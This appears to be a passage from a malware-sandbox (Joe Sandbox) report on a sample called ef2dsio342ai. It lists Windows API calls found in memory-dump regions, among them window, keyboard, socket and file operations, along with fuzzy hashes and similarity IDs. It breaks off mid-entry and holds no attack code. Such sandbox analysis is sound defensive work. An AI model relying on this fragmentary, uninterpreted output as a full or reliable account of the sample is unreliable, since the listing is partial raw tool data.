                                                                                                      • CoTaskMemFree.OLE32(?), ref: 00D95737
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                      • String ID: NULL Pointer assignment
                                                                                                      • API String ID: 614568839-2785691316
                                                                                                      • Opcode ID: e1fcf27b4acd7b54add8a4e147799e77bd598a08fedf084ecf70e1f23b3d22c5
                                                                                                      • Instruction ID: f9e2409fb8318444ca70b312a4ec2253f371f2e10b0f7aae5e35f4f75da7dfbb
                                                                                                      • Opcode Fuzzy Hash: e1fcf27b4acd7b54add8a4e147799e77bd598a08fedf084ecf70e1f23b3d22c5
                                                                                                      • Instruction Fuzzy Hash: CC910671D00219EFDF15DFA4E881AEEB7B9EF08314F10416AE915A7251EB749A44CF70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetMenu.USER32(?), ref: 00DA2AE2
                                                                                                      • GetMenuItemCount.USER32(00000000), ref: 00DA2B14
                                                                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00DA2B3C
                                                                                                      • _wcslen.LIBCMT ref: 00DA2B72
                                                                                                      • GetMenuItemID.USER32(?,?), ref: 00DA2BAC
                                                                                                      • GetSubMenu.USER32(?,?), ref: 00DA2BBA
                                                                                                        • Part of subcall function 00D742CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 00D742E6
                                                                                                        • Part of subcall function 00D742CC: GetCurrentThreadId.KERNEL32 ref: 00D742ED
                                                                                                        • Part of subcall function 00D742CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00D72E43), ref: 00D742F4
                                                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00DA2C42
                                                                                                        • Part of subcall function 00D7F1A7: Sleep.KERNEL32 ref: 00D7F21F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                      • String ID:
                                                                                                      • API String ID: 4196846111-0
                                                                                                      • Opcode ID: 962b59b3d54c159cd9e00c0206c47ba7f859f728ab02a0b0277e224f36fc215e
                                                                                                      • Instruction ID: 3c773f4ac81b54b435fa3644e128f0d271ed8e6fc792f96aed82a057cea23dd6
                                                                                                      • Opcode Fuzzy Hash: 962b59b3d54c159cd9e00c0206c47ba7f859f728ab02a0b0277e224f36fc215e
                                                                                                      • Instruction Fuzzy Hash: F7716F75A00205AFCB10EF69C885ABEBBF5EF49320F148459E856EB351DB74ED418BB0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • IsWindow.USER32(00000000), ref: 00DA8896
                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 00DA88A2
                                                                                                      • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00DA897D
                                                                                                      • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00DA89B0
                                                                                                      • IsDlgButtonChecked.USER32(?,00000000), ref: 00DA89E8
                                                                                                      • GetWindowLongW.USER32(00000000,000000EC), ref: 00DA8A0A
                                                                                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00DA8A22
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                      • String ID:
                                                                                                      • API String ID: 4072528602-0
                                                                                                      • Opcode ID: ec3a22771827ff78929c76109c241b738e0a260d6b75a147106013e30e28cb0e
                                                                                                      • Instruction ID: 2a379aa4759d808fa4c475cb98b7dd1f8e4c6b2d0661c5a7e9f7150c9a58b586
                                                                                                      • Opcode Fuzzy Hash: ec3a22771827ff78929c76109c241b738e0a260d6b75a147106013e30e28cb0e
                                                                                                      • Instruction Fuzzy Hash: EE718C34A04244AFEB259F64C894FBA7BB9EF0B300F584459EC9697261CF31A940EF31
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetParent.USER32(?), ref: 00D7B7D5
                                                                                                      • GetKeyboardState.USER32(?), ref: 00D7B7EA
                                                                                                      • SetKeyboardState.USER32(?), ref: 00D7B84B
                                                                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00D7B879
                                                                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 00D7B898
                                                                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00D7B8D9
                                                                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00D7B8FC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                                      • String ID:
                                                                                                      • API String ID: 87235514-0
                                                                                                      • Opcode ID: d82100d1d41f149ca61aad114bc553308621b1e4dd8f8ee50e8119584905dc70
                                                                                                      • Instruction ID: 0d8326a24fd4a800e499a31a007fa24c7352782049ee964baeab627f0780b17a
                                                                                                      • Opcode Fuzzy Hash: d82100d1d41f149ca61aad114bc553308621b1e4dd8f8ee50e8119584905dc70
                                                                                                      • Instruction Fuzzy Hash: 6C51B2A06047D53DFB3646348C45BBABE999F06324F0CC58AE2DD858D2E798EC88D771
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetParent.USER32(00000000), ref: 00D7B5F5
                                                                                                      • GetKeyboardState.USER32(?), ref: 00D7B60A
                                                                                                      • SetKeyboardState.USER32(?), ref: 00D7B66B
                                                                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00D7B697
                                                                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00D7B6B4
                                                                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00D7B6F3
                                                                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00D7B714
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                                      • String ID:
                                                                                                      • API String ID: 87235514-0
                                                                                                      • Opcode ID: ea3001cb921aff225e890d85bdcb7b11bccbdc7747ceb0f787d3d6b47f1918a3
                                                                                                      • Instruction ID: 9e484bc7e96f7e0853b31430d48d0545cae3782ffb20b5213632c2370a1471ed
                                                                                                      • Opcode Fuzzy Hash: ea3001cb921aff225e890d85bdcb7b11bccbdc7747ceb0f787d3d6b47f1918a3
                                                                                                      • Instruction Fuzzy Hash: 2F51B2A05047D53DFB3687248C46B7ABFA99B46324F0CC48AE1DD4A8C2E794ED88D770
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00D45F33,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00D45800
                                                                                                      • __fassign.LIBCMT ref: 00D4587B
                                                                                                      • __fassign.LIBCMT ref: 00D45896
                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00D458BC
                                                                                                      • WriteFile.KERNEL32(?,FF8BC35D,00000000,00D45F33,00000000,?,?,?,?,?,?,?,?,?,00D45F33,?), ref: 00D458DB
                                                                                                      • WriteFile.KERNEL32(?,?,00000001,00D45F33,00000000,?,?,?,?,?,?,?,?,?,00D45F33,?), ref: 00D45914
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                      • String ID:
                                                                                                      • API String ID: 1324828854-0
                                                                                                      • Opcode ID: 66f4dd2ade7cf41efc2d7403481bec71b12eb12dcb34d1dfc3c5d9a81193b5dc
                                                                                                      • Instruction ID: b6b9948acf5c9d3ea5ac7d6905be0f77ad3ffa3349647b5246ec620ec53d8f03
                                                                                                      • Opcode Fuzzy Hash: 66f4dd2ade7cf41efc2d7403481bec71b12eb12dcb34d1dfc3c5d9a81193b5dc
                                                                                                      • Instruction Fuzzy Hash: 2151D271A0024AEFCB10CFA8E881AEEBBF8EF09310F14415AE556E7292D7319950CF70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00D330DB
                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00D330E3
                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00D33171
                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00D3319C
                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00D331F1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 1170836740-1018135373
                                                                                                      • Opcode ID: 62b6bf5667a1daeb709988d748b1b21d244bc4f240fb526f1af83da3b9ac40ff
                                                                                                      • Instruction ID: 65bc845424b67b5100001977db61f4f925839d64b8254ec31adf260a76875a58
                                                                                                      • Opcode Fuzzy Hash: 62b6bf5667a1daeb709988d748b1b21d244bc4f240fb526f1af83da3b9ac40ff
                                                                                                      • Instruction Fuzzy Hash: 01417E34E00318ABCF10DF68CA85A9EBBB5EF45324F188155E815AB392D735DB15CBB0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D939AB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00D939D7
                                                                                                        • Part of subcall function 00D939AB: _wcslen.LIBCMT ref: 00D939F8
                                                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00D91A6F
                                                                                                      • WSAGetLastError.WSOCK32 ref: 00D91A7E
                                                                                                      • WSAGetLastError.WSOCK32 ref: 00D91B26
                                                                                                      • closesocket.WSOCK32(00000000), ref: 00D91B56
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                      • String ID:
                                                                                                      • API String ID: 2675159561-0
                                                                                                      • Opcode ID: fe33311970114f6a95e751453cad23fcecba782fdda835456997b979c34f5416
                                                                                                      • Instruction ID: f2ef88fb7ebd8155e489758f66f3f23f97c6ea43256989733da448f4b1bf88ad
                                                                                                      • Opcode Fuzzy Hash: fe33311970114f6a95e751453cad23fcecba782fdda835456997b979c34f5416
                                                                                                      • Instruction Fuzzy Hash: 3A410535600215AFDB109F64C844BA9BBEAEF45328F188059FC569B392DB74ED81CBF1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D7E60C: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00D7D6E2,?), ref: 00D7E629
                                                                                                        • Part of subcall function 00D7E60C: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00D7D6E2,?), ref: 00D7E642
                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00D7D705
                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00D7D73F
                                                                                                      • _wcslen.LIBCMT ref: 00D7D7C5
                                                                                                      • _wcslen.LIBCMT ref: 00D7D7DB
                                                                                                      • SHFileOperationW.SHELL32(?), ref: 00D7D821
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                      • String ID: \*.*
                                                                                                      • API String ID: 3164238972-1173974218
                                                                                                      • Opcode ID: 0bf7bece506b4d97998a34d3f9b9d316b07e6d21baee4337962d965adf4b8dc1
                                                                                                      • Instruction ID: b14a68470ffdf489995687b796828be22e4d294f206691113ee59f22b35f453a
                                                                                                      • Opcode Fuzzy Hash: 0bf7bece506b4d97998a34d3f9b9d316b07e6d21baee4337962d965adf4b8dc1
                                                                                                      • Instruction Fuzzy Hash: 2A4161719052189EDF16EBA4D981EDE77B9EF09380F0440E6A509EB141FB34A688CB70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00DA377B
                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00DA37AE
                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00DA37E3
                                                                                                      • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00DA3815
                                                                                                      • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00DA383F
                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00DA3850
                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00DA386A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LongWindow$MessageSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 2178440468-0
                                                                                                      • Opcode ID: 85b5711772e03d56910d71455267c6ae52b813decdb51bc3a3e7d6f8bdb971ff
                                                                                                      • Instruction ID: b1e4efb80b63302b7cd373ecbc85b26ec996a869283ef3d7748a76364d3ed145
                                                                                                      • Opcode Fuzzy Hash: 85b5711772e03d56910d71455267c6ae52b813decdb51bc3a3e7d6f8bdb971ff
                                                                                                      • Instruction Fuzzy Hash: 513112B1644244AFDB25DF18EC85F6537E6FB8A710F181164F512CF2B2CB70A940DB61
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D77FF8
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D7801E
                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00D78021
                                                                                                      • SysAllocString.OLEAUT32(?), ref: 00D7803F
                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00D78048
                                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00D7806D
                                                                                                      • SysAllocString.OLEAUT32(?), ref: 00D7807B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                      • String ID:
                                                                                                      • API String ID: 3761583154-0
                                                                                                      • Opcode ID: 930adc58d7b8852f2972a0cd868a18806283f7c12455184085de4add506597af
                                                                                                      • Instruction ID: ed74a48c88625ee86aaea12a4e868fd580a46d0d2ba722095e70862a87ed8dfa
                                                                                                      • Opcode Fuzzy Hash: 930adc58d7b8852f2972a0cd868a18806283f7c12455184085de4add506597af
                                                                                                      • Instruction Fuzzy Hash: 8321A772604319AF9F10DFA8CC88CBB77ADEF49364B048425F909DB290EA70DC459770
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 1000404D
                                                                                                        • Part of subcall function 10004790: __lock.LIBCMT ref: 100047A1
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 10004070
                                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 100040F1
                                                                                                      • __CxxThrowException@8.LIBCMT ref: 100040FF
                                                                                                      • std::_Facet_Register.LIBCPMT ref: 10004115
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931555351.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1931530312.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931580966.000000001001B000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931602166.0000000010022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931621641.0000000010026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_10000000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$LockitLockit::_$Exception@8Facet_RegisterThrow__lockstd::bad_exception::bad_exception
                                                                                                      • String ID: bad cast
                                                                                                      • API String ID: 153433846-3145022300
                                                                                                      • Opcode ID: 808a57c742460be9b329074f5afb13bb83e165e12c98639cacad1c3d19013b9c
                                                                                                      • Instruction ID: 0d5e10998dce30143f2cb172dadeb932d97ff3f4e4ddf0a33490b84275a7877b
                                                                                                      • Opcode Fuzzy Hash: 808a57c742460be9b329074f5afb13bb83e165e12c98639cacad1c3d19013b9c
                                                                                                      • Instruction Fuzzy Hash: 4A31C1B69001259FEB11CF94DC81A9EB7B4EF043A0F234269EA05AB255CF31BD41CBD6
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 10003F2D
                                                                                                        • Part of subcall function 10004790: __lock.LIBCMT ref: 100047A1
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 10003F50
                                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 10003FD1
                                                                                                      • __CxxThrowException@8.LIBCMT ref: 10003FDF
                                                                                                      • std::_Facet_Register.LIBCPMT ref: 10003FF5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931555351.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1931530312.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931580966.000000001001B000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931602166.0000000010022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931621641.0000000010026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_10000000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$LockitLockit::_$Exception@8Facet_RegisterThrow__lockstd::bad_exception::bad_exception
                                                                                                      • String ID: bad cast
                                                                                                      • API String ID: 153433846-3145022300
                                                                                                      • Opcode ID: 38bb4ade931d8e15de322abe2a9464b225ca52fbc78efb01af060b3aeb3b4133
                                                                                                      • Instruction ID: 1e485c2a0a6c950d113f323022ca31a9605728a1decf0708bbdf738b56a3ad9e
                                                                                                      • Opcode Fuzzy Hash: 38bb4ade931d8e15de322abe2a9464b225ca52fbc78efb01af060b3aeb3b4133
                                                                                                      • Instruction Fuzzy Hash: C331A376D041169FEB12CF54CC81AAEB7B8EF043A0F228179F945A7255DB31BD05CB92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D780D1
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D780F7
                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00D780FA
                                                                                                      • SysAllocString.OLEAUT32 ref: 00D7811B
                                                                                                      • SysFreeString.OLEAUT32 ref: 00D78124
                                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00D7813E
                                                                                                      • SysAllocString.OLEAUT32(?), ref: 00D7814C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
